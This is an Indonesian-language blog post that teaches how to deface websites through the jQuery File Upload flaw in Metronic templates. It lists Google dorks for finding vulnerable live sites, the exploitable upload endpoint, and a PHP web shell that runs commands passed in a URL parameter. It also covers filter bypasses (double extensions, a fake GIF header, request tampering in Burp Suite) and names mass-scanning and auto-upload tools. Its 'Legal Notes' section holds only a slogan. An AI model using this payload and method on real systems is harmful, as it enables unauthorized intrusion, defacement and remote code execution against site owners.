Cara Deface dengan Exploit jQuery File Upload Vulnerability
by: Nyx6st
Apa Itu jQuery File Upload Vulnerability?
jQuery File Upload adalah plugin yang memungkinkan pengguna mengunggah file ke server. Celah ditemukan pada direktori /server/php/
karena kurangnya validasi dan konfigurasi `.htaccess`, terutama pada server Apache 2.4 ke atas.
Bug ini memungkinkan kita mengunggah file arbitrer seperti gambar palsu, script JavaScript, bahkan shell/backdoor PHP jika endpoint tersebut belum diamankan.
Target: Metronic Template
Banyak situs yang menggunakan template Metronic memiliki struktur folder default seperti:
/assets/global/plugins/jquery-file-upload/
Dork Google
Cari target dengan dork berikut:
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload
intext:"Metronic Shop UI description."
Gabungkan untuk mendapatkan target akurat:
inurl:jquery-file-upload intext:"Metronic Shop UI"
Langkah Eksploitasi
-
Akses endpoint eksploit:
https://target.com/assets/global/plugins/jquery-file-upload/server/php/
(Bisa berbeda tergantung lokasi folder, coba juga:
assets/plugins/
ataupublic/assets/
) -
Jika terbuka, coba upload file berekstensi .php, .phtml, atau .jpg.php. Misalnya:
deface.php
<?php echo "Hacked by 0x6ick!"; system($_GET['cmd']); ?>
-
Setelah berhasil, akses URL payload yang terupload, biasanya di:
https://target.com/assets/global/plugins/jquery-file-upload/server/php/files/deface.php
- Jika berhasil dieksekusi, berarti server vulnerable dan siap dieksploitasi lebih lanjut.
Bypass & Teknik Lanjutan
- Rename file: Gunakan
shell.php.jpg
jika filter hanya melihat ekstensi terakhir. - Fake GIF header: Tambahkan
GIF89a
di awal shell PHP untuk lolos MIME check. - Content-Type: Gunakan
multipart/form-data
saat upload pakai curl/postman. - Manfaatkan Burp Suite: Tangkap lalu modifikasi request upload secara manual.
Scanner Tools & Automation
- jQueryUploadScanner.py: Python tool untuk mass scan folder
jquery-file-upload/server/php
- 6ickUploader: Auto upload shell dan cek path
- Dork Scraper: Ambil semua target dari Google secara otomatis
Legal Notes
Where Creativity, Exploitation, and Expression Collide.
Penutup
Celah jQuery File Upload adalah contoh klasik dari bagaimana developer lalai menghapus file demo setelah deployment. Meski bug ini tergolong lawas, tapi banyak situs legacy masih rentan karena hanya copy-paste folder Metronic atau AdminLTE tanpa proteksi tambahan.
Posting Komentar